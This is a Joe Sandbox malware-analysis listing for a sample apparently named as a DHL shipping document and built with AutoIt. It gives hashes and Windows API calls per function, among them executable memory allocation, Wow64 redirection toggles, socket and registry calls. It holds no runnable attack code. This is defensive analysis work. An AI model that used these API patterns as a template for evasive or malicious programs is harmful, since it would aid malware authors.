                                                                                  • API String ID: 3315199576-2633736733
                                                                                  • Opcode ID: 0284565c55879bd3b9d737a908711dfec0da0751d0237941fde9203e2497d141
                                                                                  • Instruction ID: 667fe6bb97883ceabdbb6e17788b1050a7a28e6f2db3f9cec332ffd45476e885
                                                                                  • Opcode Fuzzy Hash: 0284565c55879bd3b9d737a908711dfec0da0751d0237941fde9203e2497d141
                                                                                  • Instruction Fuzzy Hash: 7921F232A10218BFEF11CF55EC84FAB3BAEEF89765F418124FD049B190C671AC158BA0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009579E1
                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009579F6
                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00957A03
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: msctls_trackbar32
                                                                                  • API String ID: 3850602802-1010561917
                                                                                  • Opcode ID: 72245ff50da9fb2998e0cdc7a71570152c759c9ec6f41aa03deeaa5f3f8276c6
                                                                                  • Instruction ID: 1a5e7048cab3a70798ef498ca733c3d916215d01bfcedfefa4c235e62cac42f3
                                                                                  • Opcode Fuzzy Hash: 72245ff50da9fb2998e0cdc7a71570152c759c9ec6f41aa03deeaa5f3f8276c6
                                                                                  • Instruction Fuzzy Hash: A211E332254208BAEF109FB6DC05FAB77ADEFC9B65F010519FA41A6090D271E811DB60
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,008D4C2E), ref: 008D4CA3
                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008D4CB5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                  • API String ID: 2574300362-192647395
                                                                                  • Opcode ID: eb81768c771114ba3439b07db9d204913eef73d85811d9c5a2fbac6ed5782c5f
                                                                                  • Instruction ID: 3bced59d69797077790ba5dd3992cb326921d865eb115b6a8014a9ff29181b9b
                                                                                  • Opcode Fuzzy Hash: eb81768c771114ba3439b07db9d204913eef73d85811d9c5a2fbac6ed5782c5f
                                                                                  • Instruction Fuzzy Hash: 1ED01731524B23CFD7209F32DA28A0677E9EF057A6F11883A988AD6250E670D884CB51
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,008D4CE1,?), ref: 008D4DA2
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008D4DB4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 2574300362-1355242751
                                                                                  • Opcode ID: 00766311015ce71f030ca163bcc9168f15e4d3762f06eb8e5f956c1d3ae8646f
                                                                                  • Instruction ID: 76c8c10c3be61cf3a9e7974b474de784b24cc4886de712c1832a033e9e0dfe27
                                                                                  • Opcode Fuzzy Hash: 00766311015ce71f030ca163bcc9168f15e4d3762f06eb8e5f956c1d3ae8646f
                                                                                  • Instruction Fuzzy Hash: 8FD01731568B13CFD720AF72D818A46B7E5EF0536AF21883AD8D6D6250E770D884CB50
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,008D4D2E,?,008D4F4F,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4D6F
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008D4D81
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 2574300362-3689287502
                                                                                  • Opcode ID: 56f210fb60b3219de310e7f8e6f1aa241f5ee80c55a22da3c60bb552fe17a8a4
                                                                                  • Instruction ID: 9d10dff14b8222de2707dda598fc1d7056d158c93f86f5bfc5b7af3796f30cb7
                                                                                  • Opcode Fuzzy Hash: 56f210fb60b3219de310e7f8e6f1aa241f5ee80c55a22da3c60bb552fe17a8a4
                                                                                  • Instruction Fuzzy Hash: 3BD01730528B13CFD720AF72D818616B7E9FF15376F21893A9896D6350E670D880CB60
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,009512C1), ref: 00951080
                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00951092
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                  • API String ID: 2574300362-4033151799
                                                                                  • Opcode ID: babcdfdf6de20d7fdc399a2d85ea7fe8f882cd7116170af055563894fc8ddfde
                                                                                  • Instruction ID: 91598db695000a3e4a06a52ed3280a3414a3697fa3d89bc1d70670e54670bb77
                                                                                  • Opcode Fuzzy Hash: babcdfdf6de20d7fdc399a2d85ea7fe8f882cd7116170af055563894fc8ddfde
                                                                                  • Instruction Fuzzy Hash: A6D01230514712CFD720AF36D86861A76E8AF553A6B158C3DA8D5D7290D770C4C0C750
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00949009,?,0095F910), ref: 00949403
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00949415
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                  • API String ID: 2574300362-199464113
                                                                                  • Opcode ID: 2d9588faa3fae8d6b668994ab8db4b97ef65c1e632a0be8f8e816af476a2951f
                                                                                  • Instruction ID: 02a92b2146dab6d07efaa9f10d911db4edfbe48560a35bc0d4d471efd0ed740a
                                                                                  • Opcode Fuzzy Hash: 2d9588faa3fae8d6b668994ab8db4b97ef65c1e632a0be8f8e816af476a2951f
                                                                                  • Instruction Fuzzy Hash: 1ED01234518723CFD7209F32D91D90776D9AF05366F11C83A94D5D6560DA70C480D751
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: LocalTime__swprintf
                                                                                  • String ID: %.3d$WIN_XPe
                                                                                  • API String ID: 2070861257-2409531811
                                                                                  • Opcode ID: 60480a1a38e94eaceadca0076ea2bc4eca6beb1872a6ddf6c55d8564ba0ee6ba
                                                                                  • Instruction ID: acde5a8c40393bf53db9feef0c735704ce957bc3239394d61e660e27e24bad8c
                                                                                  • Opcode Fuzzy Hash: 60480a1a38e94eaceadca0076ea2bc4eca6beb1872a6ddf6c55d8564ba0ee6ba
                                                                                  • Instruction Fuzzy Hash: 2CD0ECB195811CFACA449A9098448FA737CB704311F5009A2F602D1544F2289BC4EB25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e13b252062d31f95caec5efd70f0bf9efa69a325177365a7fbf78e384e880d57
                                                                                  • Instruction ID: c1d71467a96dcf16717e311c4563b510a0b49530943ad153b4a6af46e47d09c1
                                                                                  • Opcode Fuzzy Hash: e13b252062d31f95caec5efd70f0bf9efa69a325177365a7fbf78e384e880d57
                                                                                  • Instruction Fuzzy Hash: B7C16D79A04226EFCB14CF94D884EAEF7B9FF48710B118599E805EB255D730ED81CB90
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0094E3D2
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 0094E415
                                                                                    • Part of subcall function 0094DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0094DAD9
                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0094E615
                                                                                  • _memmove.LIBCMT ref: 0094E628
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 3659485706-0
                                                                                  • Opcode ID: 77e43ea808054a466d0e545baecd399b83f628e3f1737711f39c40f23a8f6db4
                                                                                  • Instruction ID: 865d22332ffcae3a00bc09d330aa6b4aa8a2d00af2c4836fe5108c8ba9711165
                                                                                  • Opcode Fuzzy Hash: 77e43ea808054a466d0e545baecd399b83f628e3f1737711f39c40f23a8f6db4
                                                                                  • Instruction Fuzzy Hash: 54C126716083119FCB14DF28C490A6ABBE4FF88714F14896EF999DB351E731E946CB82
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 009483D8
                                                                                  • CoUninitialize.OLE32 ref: 009483E3
                                                                                    • Part of subcall function 0092DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0092DAC5
                                                                                  • VariantInit.OLEAUT32(?), ref: 009483EE
                                                                                  • VariantClear.OLEAUT32(?), ref: 009486BF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 780911581-0
                                                                                  • Opcode ID: 118ab0623a8e54277492696a94d4f305c859e51e19343600f0ba1ab7bc50850d
                                                                                  • Instruction ID: 2038cbc398a21e020b354cdb874455b7820fd11653e438ff53cddcb8070d7375
                                                                                  • Opcode Fuzzy Hash: 118ab0623a8e54277492696a94d4f305c859e51e19343600f0ba1ab7bc50850d
                                                                                  • Instruction Fuzzy Hash: 55A1F475204711AFCB10EF28C495E2ABBE5FF88314F154959F99A9B3A2CB34ED44CB42
                                                                                  APIs
                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00962C7C,?), ref: 00927C32
                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00962C7C,?), ref: 00927C4A
                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,0095FB80,000000FF,?,00000000,00000800,00000000,?,00962C7C,?), ref: 00927C6F
                                                                                  • _memcmp.LIBCMT ref: 00927C90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 314563124-0
                                                                                  • Opcode ID: cdf9de91238fe829cf54f96888a36abbd14cb328a6591c089ae5021a9fde7689
                                                                                  • Instruction ID: dfec31bcd41f31adaaf921c43d4ec5a4f4a0e3665480dc11453942d02a2e906d
                                                                                  • Opcode Fuzzy Hash: cdf9de91238fe829cf54f96888a36abbd14cb328a6591c089ae5021a9fde7689
                                                                                  • Instruction Fuzzy Hash: 30811771A00119EFCB00DFE4C884EAEB7B9FF89315F204599E506BB254DB31AE06CB61
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                  • String ID:
                                                                                  • API String ID: 2808897238-0
                                                                                  • Opcode ID: 489766af66bbc369aca61ec516d6b500384b061142af17d06ad5497355f8aaab
                                                                                  • Instruction ID: 89a8766e89b0864bf2c6d30c9e953607b2736108e256c738fd3bdceb0f27eb41
                                                                                  • Opcode Fuzzy Hash: 489766af66bbc369aca61ec516d6b500384b061142af17d06ad5497355f8aaab
                                                                                  • Instruction Fuzzy Hash: 0451FA306483119EDB30AFA9F491B7AF3E9EF49310F208C1FE596D7695DB3498449B01
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(00E2E4F0,?), ref: 00959AD2
                                                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00959B05
                                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00959B72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                  • String ID:
                                                                                  • API String ID: 3880355969-0
                                                                                  • Opcode ID: 7678cff716fac743c8e80b0f6cdeffc9cb49adca38841907c5f1320626cb10ea
                                                                                  • Instruction ID: da719275b2388c5b9bd3c3a42db86dca27a58252d111f25e0e5d31a0bb865070
                                                                                  • Opcode Fuzzy Hash: 7678cff716fac743c8e80b0f6cdeffc9cb49adca38841907c5f1320626cb10ea
                                                                                  • Instruction Fuzzy Hash: 0E514F34A00209EFEF10DF69E980AAE7BBAFF55361F148259FC159B290D730AD45DB90
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00946CE4
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00946CF4
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00946D58
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00946D64
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                                                  • String ID:
                                                                                  • API String ID: 2214342067-0
                                                                                  • Opcode ID: a48682f98031d0dc256941a7058a729850b10af6401901eff55da4d7d2a4c50c
                                                                                  • Instruction ID: 3b731d2c1efa7e1caf5542c00606a6b20a45f2234a97ad0f71b5bf55c4bd3868
                                                                                  • Opcode Fuzzy Hash: a48682f98031d0dc256941a7058a729850b10af6401901eff55da4d7d2a4c50c
                                                                                  • Instruction Fuzzy Hash: 7C41B475740210AFEB10AF28DC86F3A77E9EB44B24F448519FA59DB3D2DB709C008B92
                                                                                  APIs
                                                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0095F910), ref: 009467BA
                                                                                  • _strlen.LIBCMT ref: 009467EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen
                                                                                  • String ID:
                                                                                  • API String ID: 4218353326-0
                                                                                  • Opcode ID: 4df84759e7be00890da83f5ef1e45e12783f102577908824887e4f7753bfed9f
                                                                                  • Instruction ID: d4eaeeaeee38ae14acbbaf48949b48c854e7b0864beb2741895cf90542402c7d
                                                                                  • Opcode Fuzzy Hash: 4df84759e7be00890da83f5ef1e45e12783f102577908824887e4f7753bfed9f
                                                                                  • Instruction Fuzzy Hash: E4418071A00214ABCB14EB68DCD5FAEB7A9EF49314F148266F91697392DB30AD01CB52
                                                                                  APIs
                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0093BB09
                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0093BB2F
                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0093BB54
                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0093BB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 3321077145-0
                                                                                  • Opcode ID: 164f9bfe9fcd1c64347448062300bbcf2c50f85a559a8c3993058bbf7a80a071
                                                                                  • Instruction ID: 756979e02bdf42f23b05415bc9c019313bb9f7bb54907dee682be9b7db5ecdac
                                                                                  • Opcode Fuzzy Hash: 164f9bfe9fcd1c64347448062300bbcf2c50f85a559a8c3993058bbf7a80a071
                                                                                  • Instruction Fuzzy Hash: 42411A39200610EFCB10EF19C594A59BBE1FF49320F099499F98A9B362CB34FD01DB92
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00958B4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
